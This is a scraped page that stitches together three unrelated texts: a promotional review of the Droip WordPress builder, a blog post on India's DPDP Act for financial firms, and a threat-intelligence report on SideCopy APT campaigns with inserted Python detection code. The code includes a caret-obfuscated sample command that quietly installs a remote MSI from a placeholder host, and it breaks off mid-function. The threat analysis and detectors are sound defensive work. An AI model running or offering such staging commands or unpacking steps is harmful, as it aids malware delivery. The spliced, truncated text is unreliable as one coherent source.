You can even set your global header and footer as Symbols, which makes keeping everything consistent across your site way easier.
Immersive Interactions and Animations
If you have been settling for basic motion, a few hover effects, maybe a fade-in or two, it’s time to achieve more.
Droip has rich interactions and animation capabilities. You can create immersive, responsive experiences that feel polished and purposeful—not just flashy. From hover effects to scroll-based reveals, you’re free to build any web interactions.
And when you’re ready to go beyond simple effects, it has an interaction timeline that gives you a visual playground to choreograph complex, multi-step animations with ease. Paired with the custom timing editor, you can shape how your animation flows down to the finest detail.
Text Animations
It also approaches Text Animations with the same depth and flexibility. You can choose your trigger, select transition styles, and animate at the character, word, or element level.
You can fine-tune every movement, like speed, direction, intensity, delay, and duration, until it’s just right.
Multiple Backgrounds & Effects
Droip offers robust options for layering multiple backgrounds and shadow effects.
You can layer multiple backgrounds from solid colors to gradients (linear, radial, conic) or images for dynamic, vibrant designs.
Combine that with shadow effects for added depth and dimension, and you can create a truly unique visual experience without being limited by pre-set templates.
Droip Apps for Seamless Integrations
Droip has a convenient approach when it comes to connecting integrations.
You can directly install and connect third-party integrations without leaving the builder and automate workflows by integrating essential tools like analytics, email marketing, and customer support.
Native Pop-up Builder
The built-in popup builder also checks all the right boxes, giving you full control over both design and behavior.
Design your pop-ups visually, set visibility conditions, and choose custom triggers, whether it’s a click, scroll, or exit intent. You can position them exactly where you want on the screen.
But that’s not all. You can also customize the appearance with smooth transitions, whether it’s a subtle notification or a full-screen takeover.
Form Builder with Built-in Form Data Manager
Creating forms elsewhere can be a hassle, requiring multiple tools to manage both form design and data collection.
But with this no-code website builder, you can practically design any web form and then access and manage form data with the built-in Form Data Manager.
Whether you’re collecting leads, registrations, or feedback, Droip combines form creation and data management in one place.
Unlimited Breakpoints for Responsiveness
Many builders limit your ability to adjust responsiveness across devices, leaving you with only a few pre-set breakpoints.
Here, however, you can define unlimited breakpoints and fine-tune responsiveness for every screen size, ensuring your design adapts perfectly.
AI-Powered Website Creation
Droip also has AI features to assist and accelerate your entire workflow.
You can instantly generate page structures and layouts, all with a single prompt. It intelligently understands your content and automatically creates optimal layouts, which are neatly structured and easily accessible in the Layers Panel.
And if you need help crafting the perfect copy, it can do that too. It even generates meta titles and descriptions, saving you time while ensuring your site stays optimized for search engines.
Role Manager
Another essential feature for managing your website is the Role Manager.
With the Role Manager in Droip, you can control what users can access and edit within the Droip Editor.
Whether you’re working solo or collaborating with a team, Droip lets you customize who has access to what in a pretty straightforward way.
Accessibility Built-in
Accessibility is often left to external plugins in other platforms. But Droip bakes it right into the experience.
From increasing text size and reducing motion to enabling larger cursors and magnifying content, the builder offers a wide range of built-in tools to offer an inclusive website creation experience. It also includes support for various visual impairments, like color blindness.
It also has a built-in color contrast checker to ensure that your text is readable and your color choices meet accessibility standards.
Dynamic and AI-Powered SEO
For SEO, you get the basics: meta titles, descriptions, and Open Graph tags, all easily editable for every page. Even better, you can generate SEO metadata automatically with AI, saving you time.
But when working with dynamic content, Droip takes SEO a step further.
You can set dynamic SEO, so you don’t have to write SEO data for every single dynamic detail page. Whether it’s a product catalog or course listings, dynamic SEO optimizes the individual detail pages automatically, saving you from manual updates.
No Performance Compromise
With so many powerful features built into the platform, you might wonder if performance takes a hit.
But no.
While many traditional WordPress page builders produce bloated code or excessive scripts, Droip delivers clean, minimal markup so even complex sites load fast and smoothly.
Automatic Page Audit for Quality Control
Most platforms leave quality control up to you.
But Droip has a Page Audit feature that automatically catches issues before they become problems.
Whether it’s missing alt text, links, or class names, you’ll get a clear report so you can publish with confidence.
Final Verdict
With its packed feature set, slick UI, and native performance, it’s clear that Droip is a complete powerhouse solution at an unbeatable price.
It’s sleek, it’s powerful, and it’s exactly what WordPress has been waiting for.
Where other builders hit their limits, Droip puts you in the driver’s seat, giving you the freedom and tools to craft extraordinary websites.
So, if you’re still patching plugins together and wasting your money, it’s time to try Droip to feel the difference.
The Digital Personal Data Protection (DPDP) Act 2023 marks a pivotal shift in India’s data protection framework, setting clear guidelines for managing personal data. For the Banking, Financial Services, and Insurance (BFSI) sectors, which process vast volumes of sensitive customer information, this legislation is not just another compliance requirement but a strategic imperative.
The DPDP Act 2023 strengthens data security, fosters customer trust, and enhances regulatory alignment, making it a cornerstone for a resilient and customer-centric BFSI ecosystem. This blog delves into the critical reasons why this legislation is essential for the sector.
Building Customer Trust and Confidence
In the BFSI sector, trust is the foundation of strong customer relationships. The DPDP Act 2023 enhances this trust by empowering individuals (Data Principals) with greater control over their personal data, including rights to access, rectify, and request erasure under specific conditions. By aligning with the DPDP Act’s principles, BFSI organizations can reinforce their commitment to data privacy and security, strengthening customer confidence.
This proactive approach safeguards compliance and becomes a competitive differentiator in an era where data protection is a key driver of customer loyalty and business growth.
Enhanced Regulatory Compliance
The BFSI sector in India operates within a highly regulated ecosystem, overseen by authorities such as the Reserve Bank of India (RBI), the Securities and Exchange Board of India (SEBI), and the Insurance Regulatory and Development Authority of India (IRDAI). The DPDP Act 2023 complements these existing regulations by establishing a unified data protection framework for the sector.
Ensuring compliance with the DPDP Act helps BFSI organizations meet their legal obligations regarding handling digital personal data. It also mitigates the risks of regulatory penalties and legal repercussions, reinforcing operational resilience and trust.
Strengthening Data Security
Due to the highly sensitive financial and personal data it handles, the BFSI sector remains a prime target for cyberattacks and data breaches. The DPDP Act 2023 reinforces security by requiring Data Fiduciaries (entities processing personal data) to implement robust safeguards to prevent breaches and mandating timely notifications to the Data Protection Board of India and affected individuals in case of an incident.
By adhering to these stringent security requirements, BFSI institutions can enhance cybersecurity resilience, mitigate risks, and safeguard customer trust and brand reputation in an increasingly threat-prone digital landscape.
Promoting Responsible Data Handling
The DPDP Act 2023 enforces key data protection principles, including purpose limitation, data minimization, and storage limitation. For the BFSI sector, this translates to collecting only the data needed for defined purposes, retaining it only for as long as necessary, and ensuring its accuracy and integrity.
By adopting these responsible data management practices, BFSI organizations can mitigate risks associated with data misuse, strengthen regulatory compliance, and reinforce customer trust. It ensures that personal information is handled with the highest standards of security and diligence.
Enabling Innovation with Safeguards
While prioritizing data protection, the DPDP Act 2023 also acknowledges the need for lawful data processing to drive innovation and service excellence. For the BFSI sector, this enables firms to leverage data for customer insights, risk assessment, and hyper-personalization within a consent-driven framework, ensuring transparency and accountability.
The Act provides a clear legal foundation for responsible data utilization, empowering BFSI organizations to enhance customer experience, optimize decision-making, and accelerate business growth while maintaining regulatory compliance.
Key Aspects of the DPDP Act Relevant to BFSI
Several key provisions of the DPDP Act 2023 are particularly critical for the BFSI sector:
Consent Requirements: BFSI firms must obtain explicit and informed consent from customers before processing personal data, with limited exceptions for legitimate purposes.
Data Security Obligations: Implementing robust technical and organizational safeguards to protect personal data is mandatory.
Data Breach Notification: Firms must promptly report breaches to the Data Protection Board and affected customers to ensure transparency and accountability.
Data Retention Policies: BFSI entities must establish clear retention policies, ensuring data is stored only for as long as necessary for its intended purpose.
Rights of Data Principals: Organizations must enable customers to access, correct, and request erasure of their personal data through well-defined mechanisms.
Obligations of Significant Data Fiduciaries: Given the high volume and sensitivity of data handled, many BFSI firms will be classified as Significant Data Fiduciaries, requiring additional compliance measures such as appointing a Data Protection Officer (DPO) and conducting Data Protection Impact Assessments (DPIAs).
Challenges and Opportunities
Implementing the DPDP Act 2023 presents challenges for the BFSI sector, including adapting existing data processing systems, training employees on compliance requirements, and streamlining consent management. However, these challenges also serve as strategic opportunities to enhance data governance frameworks, fortify cybersecurity measures, and foster greater transparency with customers.
By proactively addressing these aspects, BFSI organizations can ensure compliance, strengthen trust, improve operational resilience, and drive long-term business growth in an evolving regulatory landscape.
Conclusion
The Digital Personal Data Protection (DPDP) Act 2023 is a landmark regulation with far-reaching implications for the BFSI sector in India. The Act fosters a more secure and trustworthy digital financial ecosystem by strengthening data protection, empowering individuals, and enforcing stringent data handling standards. Proactive compliance is not just a legal requirement but a strategic necessity for BFSI institutions to build customer trust, enhance brand reputation, and stay competitive in an evolving digital landscape.
Seqrite offers a comprehensive suite of data protection solutions to help BFSI organizations navigate the complexities of the DPDP Act and ensure robust compliance.
Seqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of December 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and university students to now include entities under railway, oil & gas, and external affairs ministries. One notable shift in recent campaigns is the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages as a primary staging mechanism.
The shift continues the group's long-running reliance on DLL side-loading and multi-platform intrusions to evade detection. Alongside it, the group has adopted reflective loading and repurposed open-source tools such as Xeno RAT and Spark RAT, continuing the pattern it established with Async RAT. A new payload dubbed CurlBack RAT, which registers the victim with the C2 server, has also been identified.
Key Findings
The usernames on the attacker's email IDs impersonate a government employee with a cyber security background; compromised IDs are also used.
A fake domain mimicking an e-governance service, with an open directory, is used to host payloads and credential phishing login pages.
Thirteen sub-domains and URLs host login pages for various RTS Services for multiple City Municipal Corporations (CMCs), all in the state of Maharashtra.
The official domain of National Hydrology Project (NHP), under the Ministry of Water Resources, has been compromised to deliver malicious payloads.
New tactics, including reflective loading and PowerShell-based AES decryption of a resource section, deploy a custom version of the C#-based open-source tool Xeno RAT.
A modified variant of the Golang-based open-source tool Spark RAT targets Linux platforms; it is deployed via the same stager previously used for Poseidon and Ares RAT payloads.
A new RAT dubbed CurlBack, loaded via DLL side-loading, registers the victim with the C2 server using a UUID and supports file transfer using curl.
Honey-trap themed campaigns were observed in January 2025 and June 2024, coinciding with the arrest of a government employee accused of leaking sensitive data to a Pakistani handler.
A previously compromised education portal seen in Aug 2024, became active again in February 2025 with new URLs targeting university students. These employ three different themes: “Climate Change”, “Research Work”, and “Professional” (Complete analysis can be viewed in the recording here, explaining six different clusters of SideCopy APT).
The parent group of SideCopy, APT36, has targeted Afghanistan after a long gap, with a theme related to the Office of the Prisoners Administration (OPA) under the Islamic Emirate of Afghanistan. A recent campaign targeting Linux systems with the theme “Developing Leadership for Future Wars” uses AES/RC4 encrypted stagers to drop the MeshAgent RMM tool.
Targeted sectors under Indian ministries
Railways
Oil & Gas
External Affairs
Defence
Phishing Emails
The campaign targeting the Defence sector begins with a phishing email dated 13 January 2025 with the subject “Update schedule for NDC 65 as discussed”. The email contains a link to download a file named “NDC65-Updated-Schedule.pdf” to lure the target.
Fig. 1 – NDC Phishing Email (1)
A second phishing email, sent on 15 January 2025 with the subject “Policy update for this course.txt”, also contains a phishing link. It originates from an official-looking email ID that is likely compromised. The National Defence College (NDC), located in Delhi and operating under the Ministry of Defence, India, is a defence services training institute for the strategy and practice of national security.
Fig. 2 – NDC Phishing Email (2)
The attacker’s email address “gsosystems-ndc@outlook[.]com”, was created on 10 January 2025 in UAE and was last seen active on 28 February 2025. OSINT reveals similar looking email ID “gsosystems.ndc-mod@nic[.]in” belonging to National Informatics Centre (NIC), a department under the Ministry of Electronics and Information Technology (MeitY), India. The username linked to the attacker’s email impersonates a government personnel member with cyber security background.
Fig. 3 – Attacker Email
Decoy Documents
The decoy is related to the National Defence College (NDC) in India and contains the Annual Training Calendar (Study & Activities) for the year 2025 for the 65th Course (NDC-65). Located in New Delhi, it is the defence service training institute and highest seat of strategic learning for officers of the Defence Service (Indian Armed Forces) and the Civil Services, all operating under the Ministry of Defence, India.
Fig. 4 – NDC Calendar Decoy [Defence]
Another phishing archive file observed with name “2024-National-Holidays-RH-PER_N-1.zip”, comes in two different variants targeting either Windows or Linux systems. Once the payload is triggered, it leads to a decoy document that contains a list of holidays for the Open Line staff for the year 2024 as the name suggests. This is an official notice from Southern Railway dated 19 December 2023, specifically for the Chennai Division. Southern Railway (SR) is one of the eighteen zones of Indian Railways, a state-owned undertaking of the Ministry of Railways, India.
Fig. 5 – Holiday List Decoy [Railways]
The third infection chain includes a document titled “Cybersecurity Guidelines” for the year 2024, which appears to be issued by Hindustan Petroleum Corporation Limited (HPCL). Headquartered in Mumbai, HPCL is a public sector undertaking in the petroleum and natural gas industry and a subsidiary of the Oil and Natural Gas Corporation (ONGC), a state-owned undertaking of the Ministry of Petroleum and Natural Gas, India.
Another document linked to the same infection is the “Pharmaceutical Product Catalogue” for 2025, issued by MAPRA. It is specifically intended for employees of the Ministry of External Affairs (MEA), in India. Mapra Laboratories Pvt. Ltd. is a pharmaceutical company with headquarters in Mumbai.
Fig. 7 – Catalogue Decoy [External Affairs]
OpenDir and CredPhish
A fake domain impersonating the e-Governance portal services has been utilized to carry out the campaign targeting railway entities. This domain was created on 16 June 2023 and features an open directory hosting multiple files, identified during the investigation.
Fig. 8 – Open directory
A total of 13 sub-domains have been identified, which function as login portals for various systems such as:
Webmail
Safety Tank Management System
Payroll System
Set Authority
These are likely used for credential phishing, actively impersonating multiple legitimate government portals since last year. These login pages are typically associated with RTS Services (Right to Public Services Act) and cater to various City Municipal Corporations (CMC). All these fake portals belong to cities located within the state of Maharashtra:
Chandrapur
Gadchiroli
Akola
Satara
Vasai Virar
Ballarpur
Mira Bhaindar
Fig. 9 – Login portals hosted on fake domain
The following table lists the identified sub-domains and the dates they were first observed (sub-domains sharing a first-seen date are grouped):

Sub-domains                                                                                   First seen
gadchiroli.egovservice[.]in                                                                   2024-12-16
pen.egovservice[.]in                                                                          2024-11-27
cpcontacts, cpanel, webdisk, cpcalendars, webmail .egovservice[.]in                           2024-01-03
dss.egovservice[.]in, cmc.egovservice[.]in                                                    2023-11-03
mail.egovservice[.]in                                                                         2023-10-13
pakola.egovservice[.]in, pakora.egovservice[.]in                                              2023-07-23
egovservice[.]in                                                                              2023-06-16
All these sub-domains share the same DNS history and have resolved primarily under AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). This points to a coordinated infrastructure set up to impersonate legitimate services and collect credentials from unsuspecting users.
Fig. 10 – DNS history
Further investigation into the open directory revealed additional URLs associated with the fake domain. These URLs likely serve similar phishing purposes and host further decoy content.
hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/
Cluster-A
The first cluster of SideCopy’s operations shows a sophisticated approach by simultaneously targeting both Windows and Linux environments. New remote access trojans (RATs) have been added to their arsenal, enhancing their capability to compromise diverse systems effectively.
Fig. 11 – Cluster A
Windows
A spear-phishing email link downloads an archive file containing a shortcut with a double extension (.pdf.lnk). The archives are hosted on domains that look legitimate:
The shortcut launches cmd.exe with arguments that use caret (^) escape characters to hinder detection and reduce readability. The LNK metadata carries a new machine ID, “dv-kevin”, where an ID with the usual “desktop-” prefix is normally seen.
Fig. 12 – Shortcuts with double extension
The msiexec.exe utility is used to install MSI packages hosted remotely, combining the install switch with the quiet-mode flag so that no UI is shown.
The first domain is the fake e-governance site seen with the open directory, while the second is a compromised domain belonging to the official National Hydrology Project, an entity under the Ministry of Water Resources. The MSI contains a .NET executable, ConsoleApp1.exe, which drops multiple Base64-encoded PE files. The decoy document is dropped in the Public directory and opened, whereas the remaining PE files are dropped in ‘C:\ProgramData\LavaSoft\’. Among them are two DLLs:
Legitimate DLL: Sampeose.dll
Malicious DLL: DUI70.dll, identified as CurlBack RAT.
Fig. 13 – Dropper within MSI package
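To make the caret trick concrete, the following Python is an added example written for this article, not Seqrite's tooling or the group's code: it undoes cmd.exe caret escaping and then flags msiexec invocations whose package argument is a remote URL, reporting the quiet switch and the obfuscation as aggravating indicators. The command lines, the files.example.net host and the package path are constructed for the example.

```python
import re

# Constructed command lines for this example (not the report's own samples).
# The first mimics a caret-obfuscated LNK launching msiexec against a remote
# package; the second is a normal local install; the third is benign cmd noise.
SAMPLE_CMDLINES = [
    r'cmd.exe /c m^s^i^e^x^e^c /^q^n /^i h^t^t^p://files.example.net/pkg/update.msi',
    r'msiexec.exe /i C:\Users\alice\Downloads\7z2301-x64.msi /qn',
    r'cmd.exe /c echo hello ^& whoami',
]

MSIEXEC_RE = re.compile(r'msiexec(?:\.exe)?$', re.IGNORECASE)
URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
SILENT_SWITCHES = {'/q', '/qn', '/qb', '/quiet', '-q', '-qn', '-qb', '-quiet'}
INSTALL_SWITCHES = {'/i', '-i', '/package', '-package', '/a', '-a'}


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping outside double quotes.

    cmd treats '^' as an escape for the next character, so 'm^s^i' is 'msi'
    and '^^' is a literal caret; inside double quotes the caret is literal.
    """
    out = []
    i = 0
    in_quotes = False
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == '^' and not in_quotes and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 1
        else:
            out.append(ch)
        i += 1
    return ''.join(out)


def classify_msiexec(cmdline: str) -> dict:
    """Describe one command line after de-obfuscation.

    'suspicious' is set when msiexec is invoked with a package fetched over
    the network (the remote staging pattern described above); the silent
    switch and caret obfuscation are reported as aggravating indicators.
    """
    clean = strip_carets(cmdline)
    tokens = clean.split()
    lowered = [t.lower() for t in tokens]
    uses_msiexec = any(MSIEXEC_RE.search(t) for t in tokens)
    remote = [t for t in tokens if URL_RE.match(t)]
    return {
        'cleaned': clean,
        'msiexec': uses_msiexec,
        'remote': remote,
        'silent': any(t in SILENT_SWITCHES for t in lowered),
        'install': any(t in INSTALL_SWITCHES for t in lowered),
        'obfuscated': '^' in cmdline,
        'suspicious': uses_msiexec and bool(remote),
    }


def scan(cmdlines):
    """Return the indexes of command lines that match the remote-MSI pattern."""
    return [i for i, c in enumerate(cmdlines) if classify_msiexec(c)['suspicious']]
```

Run `scan(SAMPLE_CMDLINES)` and only the first line is returned; the caret stripping is what makes the `msiexec` and URL tokens visible to the regexes, which is exactly why a rule matching only the raw command line would miss this sample.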
CurlBack RAT
A signed Windows binary, girbesre.exe (original name CameraSettingsUIHost.exe), is dropped beside the DLLs. Upon execution, the EXE side-loads the malicious DLL. Persistence is achieved by dropping an HTA script (svnides.hta) that creates a Run registry key for the EXE. Two different malicious DLL samples were found, with compilation timestamps of 2024-12-24 and 2024-12-30.
Fig. 14 – Checking response ‘/antivmcommand’
CurlBack RAT first checks the response of a specific URL with the path ‘/antivmcommand’. If the response is “on”, it proceeds; otherwise it terminates itself, giving the operator a remote kill switch. It then gathers system information and enumerates any connected USB devices via the registry key “SYSTEM\\ControlSet001\\Enum\\USBSTOR”.
Fig. 15 – Retrieving system info and USB devices
Connected displays are enumerated, and running processes are checked for explorer, msedge, chrome, notepad, taskmgr, services, defender, and settings.
Fig. 16 – Enumerate displays and processes
Next, it generates a UUID for client registration with the C2 server. The ID generated is dumped at “C:\Users\<username>\.client_id.txt” along with the username.
Fig. 17 – Client ID generated for C2 registration
Before registering with the ID, persistence is set up via scheduled task with the name “OneDrive” for the legitimate binary, which can be observed at the location: “C:\Windows\System32\Tasks\OneDrive”.
Fig. 18 – Scheduled Task
Reversed strings appended to the C2 domain and their purpose:

String          Functionality
/retsiger/      Register client with the C2
/sdnammoc/      Fetch commands from C2
/taebtraeh/     Check connection with C2 regularly
/stluser/       Upload results to the C2
Once registered, the connection is kept alive to retrieve any commands that are returned in the response.
Fig. 19 – Commands response after registration
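As an added example (not code from the report or from the implant), the Python below turns the reversed endpoint names into a detection over proxy logs: each URL path segment is reversed and compared against the forward names register, commands, heartbeat and results, and a client is flagged once it has hit the register path and then at least one polling path. Requests to the ‘/antivmcommand’ kill-switch path are reported separately. The log lines and the updates.example.net host are constructed; the real C2 domains are listed in the infrastructure section.

```python
from urllib.parse import urlsplit

# CurlBack endpoint names from the report, written forwards; the implant
# reverses them before appending to the C2 domain (retsiger, sdnammoc, ...).
CURLBACK_ENDPOINTS = {'register', 'commands', 'heartbeat', 'results'}
POLLING_ENDPOINTS = {'commands', 'heartbeat', 'results'}
KILL_SWITCH_PATH = '/antivmcommand'

# Constructed proxy log lines (timestamp, client, method, URL); the domain is
# a placeholder, not one of the C2 domains named in the report.
SAMPLE_PROXY_LOG = """\
2025-01-14T09:12:01Z 10.0.0.21 GET http://updates.example.net/antivmcommand
2025-01-14T09:12:02Z 10.0.0.21 POST http://updates.example.net/retsiger/
2025-01-14T09:12:32Z 10.0.0.21 GET http://updates.example.net/taebtraeh/
2025-01-14T09:13:02Z 10.0.0.21 GET http://updates.example.net/sdnammoc/
2025-01-14T09:13:05Z 10.0.0.21 POST http://updates.example.net/stluser/
2025-01-14T09:13:07Z 10.0.0.22 GET http://www.example.org/register/
2025-01-14T09:13:09Z 10.0.0.23 GET http://www.example.org/api/heartbeat
"""


def reversed_path_hits(url: str) -> list:
    """Return the endpoint names whose reversed form appears as a path segment."""
    hits = []
    for seg in urlsplit(url).path.strip('/').split('/'):
        candidate = seg[::-1].lower()
        if candidate in CURLBACK_ENDPOINTS:
            hits.append(candidate)
    return hits


def scan_proxy_log(text: str) -> dict:
    """Correlate reversed-endpoint hits per client.

    A client is flagged once it has hit the reversed 'register' path plus at
    least one polling path, which is the register, then heartbeat/commands/
    results sequence described above.  Requests to the '/antivmcommand'
    kill-switch URL are reported separately because a benign host will not
    normally ask for that path at all.
    """
    per_client = {}
    kill_switch = set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue            # malformed or truncated line; skip it
        _ts, client, _method, url = parts
        if urlsplit(url).path.rstrip('/') == KILL_SWITCH_PATH:
            kill_switch.add(client)
        for hit in reversed_path_hits(url):
            per_client.setdefault(client, set()).add(hit)
    flagged = sorted(c for c, eps in per_client.items()
                     if 'register' in eps and eps & POLLING_ENDPOINTS)
    return {'flagged': flagged,
            'kill_switch_checks': sorted(kill_switch),
            'endpoints': per_client}
```

The forward spellings ‘/register/’ and ‘/api/heartbeat’ from the other two clients are deliberately left unflagged: the indicator is the reversed form, and matching the plain words would fire on ordinary web applications.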
If the response contains any value, the implant records the current timestamp and executes one of the following C2 commands:

Command        Functionality
info           Gather system information
download       Download files from the host
persistence    Modify persistence settings
run            Execute arbitrary commands
extract        Extract data from the system
permission     Check and elevate privileges
users          Enumerate user accounts
cmd            Execute command-line operations
Fig. 20 – Checking process privilege with ‘permission’ command
Other basic functions include fetching user and host details, extracting archive files, and creating tasks. Strings and code show that curl is embedded in the malicious DLL to enumerate and transfer files of various formats:
Image files: GIF, JPEG, JPG, SVG
Text files: TXT, HTML, PDF, XML
Fig. 21 – CURL protocols supported
Linux
In addition to its Windows-focused attacks, the first cluster of SideCopy also targets Linux environments. The malicious archive file shares the same name as its Windows counterpart, but with a modification date of 2024-12-20. This archive contains a Go-based ELF binary, reflecting a consistent cross-platform strategy. Upon analysis, the function flow of the stager has code similarity to the stagers associated with Poseidon and Ares RAT. These are linked to Transparent Tribe and SideCopy APTs respectively.
Fig. 22 – Golang Stager for Linux
Stager functionality:
Uses the wget command to download a decoy (National-Holidays-RH-PER_N-1.pdf) from the egovservice domain into the target's ~/.local/share directory and opens it.
Downloads the final ELF payload as ~/.local/share/xdg-open and executes it (the name mimics the legitimate xdg-open utility, which lives in the system bin directories).
Create a crontab ‘/dev/shm/mycron’ to maintain persistence through system reboot for the payload, under the current username.
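The crontab-based persistence is straightforward to hunt for on a Linux host. The Python below is an added example for this article, not the stager or Seqrite's code: it parses `crontab -l` output and flags entries that run a binary named after a system utility (such as xdg-open) from outside the system bin directories, from under ~/.local/share, or from a world-writable temp directory such as /dev/shm. The crontab contents and the list of masqueraded utility names are assumptions of the example.

```python
import os

# Constructed `crontab -l` output for this example (not captured from a real
# host); the @reboot entry mimics the persistence the stager installs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /home/analyst/.local/share/xdg-open
*/5 * * * * /usr/bin/python3 /opt/backup/sync.py
"""

# Directories where the real xdg-open and similar utilities live.  The set of
# masqueraded names is an assumption of this example; extend it for your estate.
SYSTEM_BIN_DIRS = ('/usr/bin', '/usr/local/bin', '/bin')
MASQUERADE_NAMES = {'xdg-open', 'dbus-daemon', 'systemd', 'cron'}
SUSPICIOUS_PREFIXES = ('/dev/shm/', '/tmp/', '/var/tmp/')


def parse_crontab(text):
    """Yield (line_no, schedule, command) for every non-comment crontab entry."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('@'):              # @reboot, @daily, ...
            sched, _, cmd = line.partition(' ')
        else:
            fields = line.split(None, 5)      # five schedule fields + command
            if len(fields) < 6:
                continue
            sched, cmd = ' '.join(fields[:5]), fields[5]
        yield n, sched, cmd.strip()


def crontab_findings(text):
    """Flag entries whose command matches the stager's persistence pattern."""
    findings = []
    for n, sched, cmd in parse_crontab(text):
        reasons = []
        for token in cmd.split():
            if not token.startswith('/'):
                continue                      # only absolute paths are checked
            base = os.path.basename(token)
            if base in MASQUERADE_NAMES and os.path.dirname(token) not in SYSTEM_BIN_DIRS:
                reasons.append('system utility name outside system bin dirs: ' + token)
            if '/.local/share/' in token:
                reasons.append('executable under hidden user data dir: ' + token)
            if token.startswith(SUSPICIOUS_PREFIXES):
                reasons.append('executable in world-writable temp dir: ' + token)
        if reasons:
            if sched == '@reboot':
                reasons.append('runs at boot')
            findings.append({'line': n, 'schedule': sched, 'command': cmd, 'reasons': reasons})
    return findings
```

On the sample only the @reboot entry is reported, with three reasons. Pair this with a check for the leftover crontab source file (/dev/shm/mycron in this campaign) and with a comparison of the path that `which xdg-open` resolves to against the entry's path.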
The final payload delivered by the stager is Spark RAT, an open-source remote access trojan with cross-platform support for Windows, macOS, and Linux systems. Written in Golang and released on GitHub in 2022, the RAT is very popular with over 500 forks. Spark RAT uses WebSocket protocol and HTTP requests to communicate with the C2 server.
Fig. 23 – Custom Spark RAT ‘thunder’ connecting to C2
Features of Spark RAT include process management and termination, network traffic monitoring, file exploration and transfer, file editing and deletion, code highlighting, desktop monitoring, screenshot capture, OS information retrieval, and remote terminal access. Additionally, it supports power management functions like shutdown, reboot, log-off, sleep, hibernate and lock screen functions.
Cluster-B
The second cluster of SideCopy’s activities targets Windows systems; based on infrastructure observed since 2023, we suspect it also targets Linux systems.
Fig. 24 – Cluster B
The infection starts with a spear-phishing email link, that downloads an archive file named ‘NDC65-Updated-Schedule.zip’. This contains a shortcut file in double extension format which triggers a remote HTA file hosted on another compromised domain:
The machine ID associated with the LNK “desktop-ey8nc5b” has been observed in previous campaigns of SideCopy, although the modification date ‘2023:05:26’ suggests it may be an older one being reused. In parallel to the MSI stagers, the group continues to utilize HTA-based stagers which remain almost fully undetected (FUD).
Fig. 26 – Almost FUD stager of HTA
The HTA file contains a Base64-encoded .NET payload, BroaderAspect.dll, which is decoded and loaded directly into the memory of MSHTA. This binary opens the dropped NDC decoy document in the ProgramData directory and drops an additional .NET stager, disguised as a PDF, in the Public directory. Persistence is set via a Run registry key with the name “Edgre”, and the stager executes as:
The dropped .NET binary named ‘Myapp.pdb’ has two resource files:
“Myapp.Resources.Document.pdf”
“Myapp.Properties.Resources.resources”
The first one is decoded using Caesar cipher with shift of 9 characters in backward direction. It is dropped as ‘Public\Downloads\Document.pdf’ (122.98 KB), which is a 2004 GIAC Paper on “Advanced communication techniques of remote access trojan horses on windows operating systems”.
Fig. 27– Document with appended payload
The PDF is not merely a decoy: an encrypted payload is appended to its end. The malware searches for the “%%EOF” marker to separate PDF data from EXE data. The PDF data is extracted from the start of the file to the marker, while the EXE data is extracted after skipping 6 bytes beyond the marker.
Fig. 28 – Extracting EXE after EOF marker
After some delay, the EXE data is dropped as “Public\Downloads\suport.exe” (49.53 KB) which is sent as an argument along with a key to trigger a PowerShell command.
Fig. 29 – Extracting resource and triggering PowerShell
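The resource unpacking described above can be reproduced in a few lines. The Python below is an added example, not the stager's code: it undoes a byte-wise Caesar shift of 9, splits the carrier PDF from the bytes after the %%EOF marker, and checks that what follows is a PE image. The sample resource (a tiny PDF plus a minimal MZ/PE stub), the byte-wise interpretation of the Caesar cipher, reading “6 bytes beyond the marker” as marker-plus-line-terminator, and using the first %%EOF marker are all assumptions of the example.

```python
import struct

PDF_EOF_MARKER = b'%%EOF'
# Bytes skipped from the start of the marker to reach the appended payload: the
# 5-byte marker plus one line terminator.  That this is what "6 bytes beyond
# the marker" means is an assumption of this example.
PAYLOAD_OFFSET = 6
CAESAR_SHIFT = 9


def caesar_decode(data: bytes, shift: int = CAESAR_SHIFT) -> bytes:
    """Shift every byte backwards by `shift` (mod 256).  A byte-wise shift is an
    assumption; the report only states a Caesar cipher with shift 9 backward."""
    return bytes((b - shift) % 256 for b in data)


def caesar_encode(data: bytes, shift: int = CAESAR_SHIFT) -> bytes:
    """Inverse of caesar_decode, used here only to build the sample resource."""
    return bytes((b + shift) % 256 for b in data)


def split_pdf_and_payload(blob: bytes):
    """Split a carrier PDF from the data appended after its '%%EOF' marker.
    The first marker is used, assuming the carrier has no incremental updates."""
    idx = blob.find(PDF_EOF_MARKER)
    if idx < 0:
        raise ValueError('no %%EOF marker found')
    pdf = blob[:idx + len(PDF_EOF_MARKER)]
    payload = blob[idx + PAYLOAD_OFFSET:]
    return pdf, payload


def looks_like_pe(data: bytes) -> bool:
    """Cheap PE sanity check: MZ magic and e_lfanew pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b'PE\x00\x00'


def build_sample_resource() -> bytes:
    """Constructed stand-in for the encoded resource: a tiny PDF followed by a
    minimal MZ/PE stub, then Caesar-encoded the way the loader expects."""
    pdf = (b'%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n'
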